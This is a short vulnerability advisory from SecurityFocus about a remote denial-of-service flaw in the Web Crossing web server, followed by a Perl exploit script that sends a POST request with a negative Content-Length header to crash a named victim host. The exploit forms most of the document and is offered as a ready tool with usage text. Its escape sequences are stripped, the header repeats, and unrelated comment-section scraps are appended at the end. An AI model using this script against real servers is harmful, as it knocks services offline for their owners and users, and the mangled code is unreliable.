source: http://www.securityfocus.com/bid/9576/info
The Web Crossing Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives a malicious HTTP request that contains negative values for certain fields in the HTTP header.
#########################################################################
#!/usr/bin/perl -w
#
#########################################################################
#!/usr/bin/perl -w
#
# Web Crossing 4.x5.x Denial of Service Exploit
# [ Bad 'Content-Length' Header Bug ]
#
# - by Peter Winter-Smith [[email protected]]
use IO::Socket;
if(!($ARGV[0]))
{
print "Usage: wxdos.pl <victim>n";
exit;
}
print "Web Crossing 4.x\5.x Denial of Service Exploitn" .
"t[ Bad 'Content-Length' Header Bug ]n" .
"t[[email protected]]nn";
$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on " .
"port 80";
$DoS = "POST / HTTP/1.1rn" .
"Content-Length: -1rnrn";
print $victim $DoS;
print "[+] Evil request made to target server ... Waiting...!n";
sleep(4);
close($victim);
print "[+] Done!n";
exit;
#########################################################################
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666